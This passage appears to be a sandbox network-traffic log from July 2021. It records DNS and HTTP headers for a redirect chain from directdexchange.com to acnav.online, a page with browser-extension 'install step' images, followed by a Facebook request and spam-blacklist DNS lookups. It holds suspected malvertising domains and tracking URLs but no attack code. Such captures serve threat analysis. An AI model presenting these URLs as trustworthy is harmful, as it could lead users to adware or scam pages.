                                                                                          54.197.173.238
                                                                                        • DNS
                                                                                          www.directdexchange.com
                                                                                          Request
                                                                                          www.directdexchange.com
                                                                                          IN A
                                                                                          Response
                                                                                          www.directdexchange.com
                                                                                          IN CNAME
                                                                                          directdexchange.com
                                                                                          directdexchange.com
                                                                                          IN A
                                                                                          35.201.70.46
                                                                                        • GET
                                                                                          https://www.directdexchange.com/jump/next.php?r=4263119
                                                                                          Request
                                                                                          GET /jump/next.php?r=4263119 HTTP/2.0
                                                                                          host: www.directdexchange.com
                                                                                          accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          server: openresty
                                                                                          date: Fri, 09 Jul 2021 23:24:59 GMT
                                                                                          content-type: text/html; charset=utf-8
                                                                                          access-control-allow-origin: *
                                                                                          content-encoding: gzip
                                                                                          via: 1.1 google
                                                                                          alt-svc: clear
                                                                                        • GET
                                                                                          https://www.directdexchange.com/jump/next.php?stamat=m%7C%2CwIhFWYhFqB1dwP0dEdHP3xP.add%2C2t5FkDDYpjxJXsMWHSh7wKsTFo_9DWdVnHcBDLzDvAV_XvQEgAXq-k8ZBXLExqg8&cbrandom=0.4845958254496212&cbtitle=&cbiframe=0&cbWidth=800&cbHeight=555&cbdescription=&cbkeywords=&cbref=
                                                                                          Request
                                                                                          GET /jump/next.php?stamat=m%7C%2CwIhFWYhFqB1dwP0dEdHP3xP.add%2C2t5FkDDYpjxJXsMWHSh7wKsTFo_9DWdVnHcBDLzDvAV_XvQEgAXq-k8ZBXLExqg8&cbrandom=0.4845958254496212&cbtitle=&cbiframe=0&cbWidth=800&cbHeight=555&cbdescription=&cbkeywords=&cbref= HTTP/2.0
                                                                                          host: www.directdexchange.com
                                                                                          accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                          referer: https://www.directdexchange.com/jump/next.php?r=4263119
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 302
                                                                                          server: openresty
                                                                                          date: Fri, 09 Jul 2021 23:24:59 GMT
                                                                                          content-type: text/html; charset=utf-8
                                                                                          access-control-allow-origin: *
                                                                                          location: https://www.directdexchange.com/script/i.php?stamat=m%7C%2C%2CQjdvYidroGU3BU9GH0dEdHP3xP.3ed%2CplWRIlJnJjowuUKAKwGLzdbLV0LL6STDhH_1Q7WjzkXBxdWHS_1ZRZ2yTEJJDelXgJzXO5s2fp8Jfr6ZtnAQk6Jj_Ns1ozOZ3cn0UT-BFKspptjJmV4iBgP6r73OaIk-a1dsOiEQciNZDHfHy-aC_rOJvGAeDUfO6NEMdhXdtVFxyfFdzPU-nHFTVlRIgWPmvJcy6riwtqrfHhRfkN3-Ut4LgrmiMcX39frn8mDwBbj4kuTzHEkSdViRBG4Bz1QGpTdEgpwecdq6eWj3IYk7nf8M9_9PsxqOe85fuNFVLrn7hBp7Z_2baycLG2wvQPUUi0J2bbvO5RnWmjFJ95POMhD8ZEJVnDLk_rmzwhO04Pj1ZPnMXtx5XvAKl56GLlS0qHIZF9Rr8GZ8tKbmnnou1SfM7LfWVDUDjfXdyP1RSMBaxm9DjWXA9IRjv-mSxexNl03FOG-hAqXGoYDXJnxHKs61r3i2hlrAZGOTawRqPvg%2C
                                                                                          via: 1.1 google
                                                                                          alt-svc: clear
                                                                                        • GET
                                                                                          https://www.directdexchange.com/script/i.php?stamat=m%7C%2C%2CQjdvYidroGU3BU9GH0dEdHP3xP.3ed%2CplWRIlJnJjowuUKAKwGLzdbLV0LL6STDhH_1Q7WjzkXBxdWHS_1ZRZ2yTEJJDelXgJzXO5s2fp8Jfr6ZtnAQk6Jj_Ns1ozOZ3cn0UT-BFKspptjJmV4iBgP6r73OaIk-a1dsOiEQciNZDHfHy-aC_rOJvGAeDUfO6NEMdhXdtVFxyfFdzPU-nHFTVlRIgWPmvJcy6riwtqrfHhRfkN3-Ut4LgrmiMcX39frn8mDwBbj4kuTzHEkSdViRBG4Bz1QGpTdEgpwecdq6eWj3IYk7nf8M9_9PsxqOe85fuNFVLrn7hBp7Z_2baycLG2wvQPUUi0J2bbvO5RnWmjFJ95POMhD8ZEJVnDLk_rmzwhO04Pj1ZPnMXtx5XvAKl56GLlS0qHIZF9Rr8GZ8tKbmnnou1SfM7LfWVDUDjfXdyP1RSMBaxm9DjWXA9IRjv-mSxexNl03FOG-hAqXGoYDXJnxHKs61r3i2hlrAZGOTawRqPvg%2C
                                                                                          Request
                                                                                          GET /script/i.php?stamat=m%7C%2C%2CQjdvYidroGU3BU9GH0dEdHP3xP.3ed%2CplWRIlJnJjowuUKAKwGLzdbLV0LL6STDhH_1Q7WjzkXBxdWHS_1ZRZ2yTEJJDelXgJzXO5s2fp8Jfr6ZtnAQk6Jj_Ns1ozOZ3cn0UT-BFKspptjJmV4iBgP6r73OaIk-a1dsOiEQciNZDHfHy-aC_rOJvGAeDUfO6NEMdhXdtVFxyfFdzPU-nHFTVlRIgWPmvJcy6riwtqrfHhRfkN3-Ut4LgrmiMcX39frn8mDwBbj4kuTzHEkSdViRBG4Bz1QGpTdEgpwecdq6eWj3IYk7nf8M9_9PsxqOe85fuNFVLrn7hBp7Z_2baycLG2wvQPUUi0J2bbvO5RnWmjFJ95POMhD8ZEJVnDLk_rmzwhO04Pj1ZPnMXtx5XvAKl56GLlS0qHIZF9Rr8GZ8tKbmnnou1SfM7LfWVDUDjfXdyP1RSMBaxm9DjWXA9IRjv-mSxexNl03FOG-hAqXGoYDXJnxHKs61r3i2hlrAZGOTawRqPvg%2C HTTP/2.0
                                                                                          host: www.directdexchange.com
                                                                                          accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                          referer: https://www.directdexchange.com/jump/next.php?r=4263119
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 302
                                                                                          server: openresty
                                                                                          date: Fri, 09 Jul 2021 23:25:00 GMT
                                                                                          content-type: text/html; charset=utf-8
                                                                                          access-control-allow-origin: *
                                                                                          location: https://dist.acnav.online/?c=ac&subid=16258730992587707149259233454695320&cid=4263119
                                                                                          referrer-policy: no-referrer
                                                                                          via: 1.1 google
                                                                                          alt-svc: clear
                                                                                        • DNS
                                                                                          dist.acnav.online
                                                                                          Request
                                                                                          dist.acnav.online
                                                                                          IN A
                                                                                          Response
                                                                                          dist.acnav.online
                                                                                          IN CNAME
                                                                                          hidden-roadrunner-k7np31v1e60rzrp6qya5k4lv.herokudns.com
                                                                                          hidden-roadrunner-k7np31v1e60rzrp6qya5k4lv.herokudns.com
                                                                                          IN A
                                                                                          52.20.78.240
                                                                                          hidden-roadrunner-k7np31v1e60rzrp6qya5k4lv.herokudns.com
                                                                                          IN A
                                                                                          3.220.57.224
                                                                                          hidden-roadrunner-k7np31v1e60rzrp6qya5k4lv.herokudns.com
                                                                                          IN A
                                                                                          54.91.59.199
                                                                                          hidden-roadrunner-k7np31v1e60rzrp6qya5k4lv.herokudns.com
                                                                                          IN A
                                                                                          3.232.242.170
                                                                                        • DNS
                                                                                          dist.acnav.online
                                                                                          Request
                                                                                          dist.acnav.online
                                                                                          IN A
                                                                                          Response
                                                                                          dist.acnav.online
                                                                                          IN CNAME
                                                                                          hidden-roadrunner-k7np31v1e60rzrp6qya5k4lv.herokudns.com
                                                                                          hidden-roadrunner-k7np31v1e60rzrp6qya5k4lv.herokudns.com
                                                                                          IN A
                                                                                          52.20.78.240
                                                                                          hidden-roadrunner-k7np31v1e60rzrp6qya5k4lv.herokudns.com
                                                                                          IN A
                                                                                          3.220.57.224
                                                                                          hidden-roadrunner-k7np31v1e60rzrp6qya5k4lv.herokudns.com
                                                                                          IN A
                                                                                          54.91.59.199
                                                                                          hidden-roadrunner-k7np31v1e60rzrp6qya5k4lv.herokudns.com
                                                                                          IN A
                                                                                          3.232.242.170
                                                                                        • GET
                                                                                          https://dist.acnav.online/?c=ac&subid=16258730992587707149259233454695320&cid=4263119
                                                                                          Request
                                                                                          GET /?c=ac&subid=16258730992587707149259233454695320&cid=4263119 HTTP/1.1
                                                                                          Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                          Referer: https://www.directdexchange.com/jump/next.php?r=4263119
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: dist.acnav.online
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: _ga=GA1.2.1293510956.1625879843; _gid=GA1.2.34305125.1625879843
                                                                                          Response
                                                                                          HTTP/1.1 302 Found
                                                                                          Server: Cowboy
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: Express
                                                                                          Location: https://www.acnav.online?c=ac&subid=16258730992587707149259233454695320&cid=4263119
                                                                                          Vary: Accept
                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                          Content-Length: 105
                                                                                          Date: Fri, 09 Jul 2021 23:25:00 GMT
                                                                                          Via: 1.1 vegur
                                                                                        • DNS
                                                                                          www.acnav.online
                                                                                          Request
                                                                                          www.acnav.online
                                                                                          IN A
                                                                                          Response
                                                                                          www.acnav.online
                                                                                          IN CNAME
                                                                                          animate-whippet-qotfzhmasm9zl23tfv4hg9k1.herokudns.com
                                                                                          animate-whippet-qotfzhmasm9zl23tfv4hg9k1.herokudns.com
                                                                                          IN A
                                                                                          52.20.78.240
                                                                                          animate-whippet-qotfzhmasm9zl23tfv4hg9k1.herokudns.com
                                                                                          IN A
                                                                                          3.220.57.224
                                                                                          animate-whippet-qotfzhmasm9zl23tfv4hg9k1.herokudns.com
                                                                                          IN A
                                                                                          54.91.59.199
                                                                                          animate-whippet-qotfzhmasm9zl23tfv4hg9k1.herokudns.com
                                                                                          IN A
                                                                                          3.232.242.170
                                                                                        • GET
                                                                                          https://www.acnav.online/?c=ac&subid=16258730992587707149259233454695320&cid=4263119
                                                                                          Request
                                                                                          GET /?c=ac&subid=16258730992587707149259233454695320&cid=4263119 HTTP/1.1
                                                                                          Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                          Referer: https://www.directdexchange.com/jump/next.php?r=4263119
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.acnav.online
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: _ga=GA1.2.1293510956.1625879843; _gid=GA1.2.34305125.1625879843; vid=11657feb-04cd-907d-bfee-9bc2af73e405
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: Cowboy
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: Express
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 31283
                                                                                          Etag: "-70761292"
                                                                                          Date: Fri, 09 Jul 2021 23:25:00 GMT
                                                                                          Via: 1.1 vegur
                                                                                        • GET
                                                                                          https://www.acnav.online/js/global.min.js
                                                                                          Request
                                                                                          GET /js/global.min.js HTTP/1.1
                                                                                          Accept: application/javascript, */*;q=0.8
                                                                                          Referer: https://www.acnav.online/?c=ac&subid=16258730992587707149259233454695320&cid=4263119
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.acnav.online
                                                                                          If-Modified-Since: Mon, 05 Jul 2021 08:46:15 GMT
                                                                                          If-None-Match: "2171-1625474775000"
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: _ga=GA1.2.1293510956.1625879843; _gid=GA1.2.34305125.1625879843; vid=11657feb-04cd-907d-bfee-9bc2af73e405
                                                                                          Response
                                                                                          HTTP/1.1 304 Not Modified
                                                                                          Server: Cowboy
                                                                                          Content-Length: 0
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: Express
                                                                                          Accept-Ranges: bytes
                                                                                          Etag: "2171-1625474775000"
                                                                                          Date: Fri, 09 Jul 2021 23:25:00 GMT
                                                                                          Cache-Control: public, max-age=0
                                                                                          Last-Modified: Mon, 05 Jul 2021 08:46:15 GMT
                                                                                          Via: 1.1 vegur
                                                                                        • GET
                                                                                          https://www.acnav.online/images/install-step3.png
                                                                                          Request
                                                                                          GET /images/install-step3.png HTTP/1.1
                                                                                          Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          Referer: https://www.acnav.online/?c=ac&subid=16258730992587707149259233454695320&cid=4263119
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.acnav.online
                                                                                          If-Modified-Since: Mon, 05 Jul 2021 08:46:15 GMT
                                                                                          If-None-Match: "14921-1625474775000"
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: _ga=GA1.2.1293510956.1625879843; _gid=GA1.2.34305125.1625879843; vid=11657feb-04cd-907d-bfee-9bc2af73e405
                                                                                          Response
                                                                                          HTTP/1.1 304 Not Modified
                                                                                          Server: Cowboy
                                                                                          Content-Length: 0
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: Express
                                                                                          Accept-Ranges: bytes
                                                                                          Etag: "14921-1625474775000"
                                                                                          Date: Fri, 09 Jul 2021 23:25:01 GMT
                                                                                          Cache-Control: public, max-age=0
                                                                                          Last-Modified: Mon, 05 Jul 2021 08:46:15 GMT
                                                                                          Via: 1.1 vegur
                                                                                        • GET
                                                                                          https://www.acnav.online/config.min.js
                                                                                          Request
                                                                                          GET /config.min.js HTTP/1.1
                                                                                          Accept: application/javascript, */*;q=0.8
                                                                                          Referer: https://www.acnav.online/?c=ac&subid=16258730992587707149259233454695320&cid=4263119
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.acnav.online
                                                                                          If-Modified-Since: Mon, 05 Jul 2021 08:46:15 GMT
                                                                                          If-None-Match: "1060-1625474775000"
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: _ga=GA1.2.1293510956.1625879843; _gid=GA1.2.34305125.1625879843; vid=11657feb-04cd-907d-bfee-9bc2af73e405
                                                                                          Response
                                                                                          HTTP/1.1 304 Not Modified
                                                                                          Server: Cowboy
                                                                                          Content-Length: 0
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: Express
                                                                                          Accept-Ranges: bytes
                                                                                          Etag: "1060-1625474775000"
                                                                                          Date: Fri, 09 Jul 2021 23:25:00 GMT
                                                                                          Cache-Control: public, max-age=0
                                                                                          Last-Modified: Mon, 05 Jul 2021 08:46:15 GMT
                                                                                          Via: 1.1 vegur
                                                                                        • GET
                                                                                          https://www.acnav.online/layouts/box/box.css
                                                                                          Request
                                                                                          GET /layouts/box/box.css HTTP/1.1
                                                                                          Accept: text/css, */*
                                                                                          Referer: https://www.acnav.online/?c=ac&subid=16258730992587707149259233454695320&cid=4263119
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.acnav.online
                                                                                          If-Modified-Since: Mon, 05 Jul 2021 08:46:15 GMT
                                                                                          If-None-Match: "10747-1625474775000"
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: _ga=GA1.2.1293510956.1625879843; _gid=GA1.2.34305125.1625879843; vid=11657feb-04cd-907d-bfee-9bc2af73e405
                                                                                          Response
                                                                                          HTTP/1.1 304 Not Modified
                                                                                          Server: Cowboy
                                                                                          Content-Length: 0
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: Express
                                                                                          Accept-Ranges: bytes
                                                                                          Etag: "10747-1625474775000"
                                                                                          Date: Fri, 09 Jul 2021 23:25:00 GMT
                                                                                          Cache-Control: public, max-age=0
                                                                                          Last-Modified: Mon, 05 Jul 2021 08:46:15 GMT
                                                                                          Via: 1.1 vegur
                                                                                        • GET
                                                                                          https://www.acnav.online/images/install-step2.png
                                                                                          Request
                                                                                          GET /images/install-step2.png HTTP/1.1
                                                                                          Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          Referer: https://www.acnav.online/?c=ac&subid=16258730992587707149259233454695320&cid=4263119
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.acnav.online
                                                                                          If-Modified-Since: Mon, 05 Jul 2021 08:46:15 GMT
                                                                                          If-None-Match: "20738-1625474775000"
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: _ga=GA1.2.1293510956.1625879843; _gid=GA1.2.34305125.1625879843; vid=11657feb-04cd-907d-bfee-9bc2af73e405
                                                                                          Response
                                                                                          HTTP/1.1 304 Not Modified
                                                                                          Server: Cowboy
                                                                                          Content-Length: 0
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: Express
                                                                                          Accept-Ranges: bytes
                                                                                          Etag: "20738-1625474775000"
                                                                                          Date: Fri, 09 Jul 2021 23:25:01 GMT
                                                                                          Cache-Control: public, max-age=0
                                                                                          Last-Modified: Mon, 05 Jul 2021 08:46:15 GMT
                                                                                          Via: 1.1 vegur
                                                                                        • GET
                                                                                          https://www.acnav.online/resources/Wiki/links.json
                                                                                          Request
                                                                                          GET /resources/Wiki/links.json HTTP/1.1
                                                                                          Accept: */*
                                                                                          Referer: https://www.acnav.online/?c=ac&subid=16258730992587707149259233454695320&cid=4263119
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.acnav.online
                                                                                          If-Modified-Since: Mon, 05 Jul 2021 08:46:15 GMT
                                                                                          If-None-Match: "389-1625474775000"
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: _ga=GA1.2.1293510956.1625879843; _gid=GA1.2.34305125.1625879843; _gat=1; vid=11657feb-04cd-907d-bfee-9bc2af73e405
                                                                                          Response
                                                                                          HTTP/1.1 304 Not Modified
                                                                                          Server: Cowboy
                                                                                          Content-Length: 0
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: Express
                                                                                          Accept-Ranges: bytes
                                                                                          Etag: "389-1625474775000"
                                                                                          Date: Fri, 09 Jul 2021 23:25:01 GMT
                                                                                          Cache-Control: public, max-age=0
                                                                                          Last-Modified: Mon, 05 Jul 2021 08:46:15 GMT
                                                                                          Via: 1.1 vegur
                                                                                        • GET
                                                                                          https://www.acnav.online/images/install-step1-chrome.png
                                                                                          Request
                                                                                          GET /images/install-step1-chrome.png HTTP/1.1
                                                                                          Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          Referer: https://www.acnav.online/?c=ac&subid=16258730992587707149259233454695320&cid=4263119
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.acnav.online
                                                                                          If-Modified-Since: Mon, 05 Jul 2021 08:46:15 GMT
                                                                                          If-None-Match: "23056-1625474775000"
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: _ga=GA1.2.1293510956.1625879843; _gid=GA1.2.34305125.1625879843; vid=11657feb-04cd-907d-bfee-9bc2af73e405
                                                                                          Response
                                                                                          HTTP/1.1 304 Not Modified
                                                                                          Server: Cowboy
                                                                                          Content-Length: 0
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: Express
                                                                                          Accept-Ranges: bytes
                                                                                          Etag: "23056-1625474775000"
                                                                                          Date: Fri, 09 Jul 2021 23:25:01 GMT
                                                                                          Cache-Control: public, max-age=0
                                                                                          Last-Modified: Mon, 05 Jul 2021 08:46:15 GMT
                                                                                          Via: 1.1 vegur
                                                                                        • GET
                                                                                          https://www.acnav.online/lang/box/ePedia
                                                                                          Request
                                                                                          GET /lang/box/ePedia HTTP/1.1
                                                                                          Accept: */*
                                                                                          Referer: https://www.acnav.online/?c=ac&subid=16258730992587707149259233454695320&cid=4263119
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.acnav.online
                                                                                          If-None-Match: "1455465032"
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: _ga=GA1.2.1293510956.1625879843; _gid=GA1.2.34305125.1625879843; _gat=1; vid=11657feb-04cd-907d-bfee-9bc2af73e405
                                                                                          Response
                                                                                          HTTP/1.1 304 Not Modified
                                                                                          Server: Cowboy
                                                                                          Content-Length: 0
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: Express
                                                                                          Etag: "1455465032"
                                                                                          Date: Fri, 09 Jul 2021 23:25:01 GMT
                                                                                          Via: 1.1 vegur
                                                                                        • GET
                                                                                          https://www.acnav.online/resources/Wiki/background.png
                                                                                          Request
                                                                                          GET /resources/Wiki/background.png HTTP/1.1
                                                                                          Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          Referer: https://www.acnav.online/?c=ac&subid=16258730992587707149259233454695320&cid=4263119
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.acnav.online
                                                                                          If-Modified-Since: Mon, 05 Jul 2021 08:46:15 GMT
                                                                                          If-None-Match: "65781-1625474775000"
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: _ga=GA1.2.1293510956.1625879843; _gid=GA1.2.34305125.1625879843; _gat=1; vid=11657feb-04cd-907d-bfee-9bc2af73e405
                                                                                          Response
                                                                                          HTTP/1.1 304 Not Modified
                                                                                          Server: Cowboy
                                                                                          Content-Length: 0
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: Express
                                                                                          Accept-Ranges: bytes
                                                                                          Etag: "65781-1625474775000"
                                                                                          Date: Fri, 09 Jul 2021 23:25:01 GMT
                                                                                          Cache-Control: public, max-age=0
                                                                                          Last-Modified: Mon, 05 Jul 2021 08:46:15 GMT
                                                                                          Via: 1.1 vegur
                                                                                        • GET
                                                                                          https://www.acnav.online/resources/Wiki/logo.png
                                                                                          Request
                                                                                          GET /resources/Wiki/logo.png HTTP/1.1
                                                                                          Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          Referer: https://www.acnav.online/?c=ac&subid=16258730992587707149259233454695320&cid=4263119
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.acnav.online
                                                                                          If-Modified-Since: Mon, 05 Jul 2021 08:46:15 GMT
                                                                                          If-None-Match: "9614-1625474775000"
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: _ga=GA1.2.1293510956.1625879843; _gid=GA1.2.34305125.1625879843; _gat=1; vid=11657feb-04cd-907d-bfee-9bc2af73e405
                                                                                          Response
                                                                                          HTTP/1.1 304 Not Modified
                                                                                          Server: Cowboy
                                                                                          Content-Length: 0
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: Express
                                                                                          Accept-Ranges: bytes
                                                                                          Etag: "9614-1625474775000"
                                                                                          Date: Fri, 09 Jul 2021 23:25:01 GMT
                                                                                          Cache-Control: public, max-age=0
                                                                                          Last-Modified: Mon, 05 Jul 2021 08:46:15 GMT
                                                                                          Via: 1.1 vegur
                                                                                        • GET
                                                                                          https://www.acnav.online/favicon.ico
                                                                                          Request
                                                                                          GET /favicon.ico HTTP/1.1
                                                                                          Accept: */*
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Host: www.acnav.online
                                                                                          DNT: 1
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: Cowboy
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: Express
                                                                                          Content-Type: text/html
                                                                                          Vary: Accept-Encoding
                                                                                          Date: Fri, 09 Jul 2021 23:25:01 GMT
                                                                                          Transfer-Encoding: chunked
                                                                                          Via: 1.1 vegur
                                                                                        • DNS
                                                                                          www.facebook.com
                                                                                          Request
                                                                                          www.facebook.com
                                                                                          IN A
                                                                                          Response
                                                                                          www.facebook.com
                                                                                          IN CNAME
                                                                                          star-mini.c10r.facebook.com
                                                                                          star-mini.c10r.facebook.com
                                                                                          IN A
                                                                                          157.240.201.35
                                                                                        • GET
                                                                                          https://www.facebook.com/
                                                                                          Request
                                                                                          GET / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                          Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                                                                                          viewport-width: 1920
                                                                                          Sec-Fetch-Dest: document
                                                                                          Sec-Fetch-Mode: navigate
                                                                                          Sec-Fetch-Site: none
                                                                                          Sec-Fetch-User: ?1
                                                                                          Upgrade-Insecure-Requests: 1
                                                                                          Host: www.facebook.com
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Vary: Accept-Encoding
                                                                                          x-fb-rlafr: 0
                                                                                          Pragma: no-cache
                                                                                          Cache-Control: private, no-cache, no-store, must-revalidate
                                                                                          Expires: Sat, 01 Jan 2000 00:00:00 GMT
                                                                                          X-Content-Type-Options: nosniff
                                                                                          X-XSS-Protection: 0
                                                                                          content-security-policy: default-src facebook.com *.facebook.com fbcdn.net *.fbcdn.net fbsbx.com *.fbsbx.com cdninstagram.com *.cdninstagram.com data: blob: 'self';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src data: blob: 'unsafe-inline' facebook.com *.facebook.com fbcdn.net *.fbcdn.net fbsbx.com *.fbsbx.com cdninstagram.com *.cdninstagram.com;connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* attachment.fbsbx.com blob: *.cdninstagram.com 'self';block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c;
                                                                                          X-Frame-Options: DENY
                                                                                          Strict-Transport-Security: max-age=15552000; preload
                                                                                          Content-Type: text/html; charset="utf-8"
                                                                                          X-FB-Debug: ZULurZY+R4Q5SZfs7oONUzIHuoK8KazZxBuImD222sP8XdDdXsw4C0mr4KlGiZvJPfSMyJ+bUoMDtNnx2elYMg==
                                                                                          Date: Fri, 09 Jul 2021 23:25:10 GMT
                                                                                          Transfer-Encoding: chunked
                                                                                          Alt-Svc: h3-29=":443"; ma=3600,h3-27=":443"; ma=3600
                                                                                          Connection: keep-alive
                                                                                        • DNS
                                                                                          13.71.61.154.dnsbl.sorbs.net
                                                                                          Request
                                                                                          13.71.61.154.dnsbl.sorbs.net
                                                                                          IN A
                                                                                          Response
                                                                                        • DNS
                                                                                          13.71.61.154.bl.spamcop.net
                                                                                          Request
